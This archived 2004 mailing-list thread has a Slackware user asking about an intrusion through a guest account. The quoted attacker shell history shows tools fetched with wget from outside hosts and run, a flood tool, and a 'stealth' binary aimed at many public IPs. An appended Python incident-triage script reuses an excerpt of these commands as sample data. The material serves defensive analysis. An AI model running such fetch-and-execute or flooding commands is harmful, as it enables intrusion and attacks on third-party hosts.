Re: [SLUG] Someone in my computer

From: Ian Blenke (icblenke@nks.net)
Date: Tue Aug 24 2004 - 11:22:28 EDT


 From the URLs and IPs, it looks like a Romanian hacker. There are a few
interesting exploits there.

When I get some time I'll look through them and make some guesses as to
what he is doing.

At this point you should consider your machine rootkitted and suspect.

- Ian

Tevfik Yucek wrote:

>Hi all,
>
>
>Last night I realized there was someone in my computer, Slackware 10.
>I have sshd running and he/she/it connected to my computer and
>executed the following commands.
>
>I am usually not concerned with security and did not care about much
>until yesterday. I had a guest "user" account with password "guest"
>and he/she/it used it.
>
>So, here are my questions:
> - how did he/she/it know my IP, how did they know I was
>using Linux, and how did he/she/it get the password? Just guessing?
> - how can I kick a user if I notice that I have an uninvited
>visitor? I had to stop the internet connection of my computer.
> - what do the commands below do and should I do something about
>them?
>
>
>Thanks,
>Tevfik
>
>Here are the commands:
>
>passwd
>cat /etc/issue
>cd /tmp
>mdkri .src
>cd .src
>mkdir .src
>cd .src
>wget carmelo.go.ro/do.tgz
>tar zxvf do.tgz
>rm -rf do.tgz
>./do
>./do
>wget 0kas.com/prt.tgz
>tar zxvf prt.tgz
>./x
>./x
>./x
>./x
>./x
>./x
>wget stefang.com/prostii/n
>chmod +x n
>./n
>./n
>./n
>./n
>./n
>./n
>./n
>./n
>./n
>./n
>ls
>./n
>./x
>./x
>./x
>wget yahaa.at/p/90
>./90
>chmod +x 90
>./90
>./90
>wget 0kas.com/Florin/flood.tar.gz
>tar zxvf flood.tar.gz
>rm -rf flood.tar.gz
>ls
>rm -rf prt.tgz
>ls
>rm -rf prt.tgz
>cd belea
>./stealth 218.38.3.83 53
>cd /tmp/.src/belea
>./stealth 80.97.245.241 53
>
>
>./stealth
>^[[A
>
>w
>cd /tmp/.src
>cd belea
>./steath 82.208.160.155 53
>./steath 82.208.160.155 53
>./steath 82.208.160.155 53
>./stealth 82.208.160.155 53
>./stealth 82.208.160.155 53
>export PATH="."
>bash
>cd /tmp/.src/belea
>w
>w
>cat psybnc.conf
>locate psybnc.conf
>./stealth 213.154.149.199 53
>w
>./stealth 213.233.97.53 53
>./stealth 194.105.27.21 80
>./stealth 81.196.147.218 53
>./stealth 81.196.59.83 80
>./stealth 81.196.59.83 53
>cd /tmp/.src
>cd belea
>./stealth 80.96.146.171 53
>cd /tmp/ .scr/belea
>./stealth 81.196.147.170 53
>./stealth 81.196.147.170 55
>./stealth 81.196.147.170 53
>./stealth 211.47.141.43 53
>cd .src
>ce belea
>cd belea
>./stealth 211.47.141.43
>./stealth 211.47.141.43 53
>./stealth 211.47.141.43 53
>w
>-----------------------------------------------------------------------
>This list is provided as an unmoderated internet service by Networked
>Knowledge Systems (NKS). Views and opinions expressed in messages
>posted are those of the author and do not necessarily reflect the
>official policy or position of NKS or any of its employees.
>
>

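The transcript Tevfik posted is the kind of shell history an incident responder gets handed first. The following script is an added example, not code from this thread or from either poster: it walks such a history and pulls out what was fetched and from which hosts, which dropped binaries were made executable and re-run, which external host:port pairs were passed as arguments to those binaries, and a few behaviours worth flagging (hidden directory under /tmp, PATH rewritten to ".", a bouncer config being read). The embedded sample is an excerpt of the transcript quoted above; the indicator categories and thresholds are my own choices, and the script does not claim to know what "stealth" or the other binaries actually do, it only records how they were invoked.

```python
import re
from collections import Counter

# Excerpt of the attacker command transcript quoted in the message above.
SAMPLE_HISTORY = """\
passwd
cat /etc/issue
cd /tmp
mdkri .src
mkdir .src
cd .src
wget carmelo.go.ro/do.tgz
tar zxvf do.tgz
rm -rf do.tgz
./do
./do
wget 0kas.com/prt.tgz
tar zxvf prt.tgz
./x
./x
wget stefang.com/prostii/n
chmod +x n
./n
./n
wget yahaa.at/p/90
./90
chmod +x 90
./90
wget 0kas.com/Florin/flood.tar.gz
tar zxvf flood.tar.gz
cd belea
./stealth 218.38.3.83 53
./steath 82.208.160.155 53
./stealth 82.208.160.155 53
export PATH="."
bash
cat psybnc.conf
./stealth 194.105.27.21 80
w
"""

IP_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")


def triage(history):
    """Extract first-pass indicators from a captured shell history.

    Returns a dict of: wget URLs and their hosts, how often each ./binary
    was run, what was chmod'ed executable, host:port arguments handed to
    dropped binaries, and free-text flags for suspicious behaviour.
    """
    downloads = []        # URLs passed to wget, in order
    executed = Counter()  # basename of ./binary -> number of invocations
    made_executable = []  # files given +x
    targets = []          # (host, port) args passed to a dropped binary
    flags = []            # one-line notes for the responder

    for raw in history.splitlines():
        parts = raw.strip().split()
        if not parts:
            continue
        cmd, args = parts[0], parts[1:]

        if cmd == "wget" and args:
            downloads.append(args[0])
        elif cmd == "chmod" and len(args) >= 2 and "x" in args[0]:
            made_executable.append(args[1])
        elif cmd == "mkdir" and args and args[-1].startswith("."):
            flags.append("hidden directory created: %s" % args[-1])
        elif cmd == "export" and args and args[0].startswith("PATH="):
            flags.append("PATH overridden: %s" % " ".join(parts))
        elif cmd == "cat" and args and "bnc" in args[-1].lower():
            flags.append("IRC bouncer config read: %s" % args[-1])
        elif cmd.startswith("./"):
            name = cmd[2:]
            executed[name] += 1
            # A dropped tool invoked as "./tool <ip> <port>" records an
            # outbound target; we do not assume what the tool does with it.
            if len(args) >= 2 and IP_RE.match(args[0]) and args[1].isdigit():
                targets.append((args[0], int(args[1])))

    # Threshold of 2 is an arbitrary choice: a fresh binary re-run several
    # times with no arguments is worth a closer look regardless of its name.
    repeated = sorted(n for n, c in executed.items() if c >= 2)
    return {
        "downloads": downloads,
        "download_hosts": sorted({u.split("/", 1)[0] for u in downloads}),
        "executed": dict(executed),
        "made_executable": made_executable,
        "repeated": repeated,
        "targets": targets,
        "target_hosts": sorted({h for h, _ in targets}),
        "target_ports": dict(Counter(p for _, p in targets)),
        "flags": flags,
    }


def report(result):
    """Render the triage dict as a short plain-text summary."""
    lines = ["Fetched from: " + ", ".join(result["download_hosts"])]
    lines.extend("  wget " + u for u in result["downloads"])
    lines.append("Dropped binaries run more than once: " + ", ".join(result["repeated"]))
    lines.append("Hosts the dropped tools were pointed at (host:port):")
    lines.extend("  %s:%d" % (h, p) for h, p in result["targets"])
    lines.extend("FLAG " + f for f in result["flags"])
    return "\n".join(lines)


if __name__ == "__main__":
    print(report(triage(SAMPLE_HISTORY)))
```

Feed it the full history instead of the excerpt (`triage(open("history").read())`) and the target list gives you the remote hosts to contact or block, the download hosts give you the URLs to pull copies of the tools from for analysis, and the flags tell you where to look on disk. None of this replaces Ian's point: once an unknown binary has run as even an unprivileged user on an unpatched box, the host itself is suspect and the history is evidence, not a cleanup list.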



This archive was generated by hypermail 2.1.3 : Fri Aug 01 2014 - 15:16:12 EDT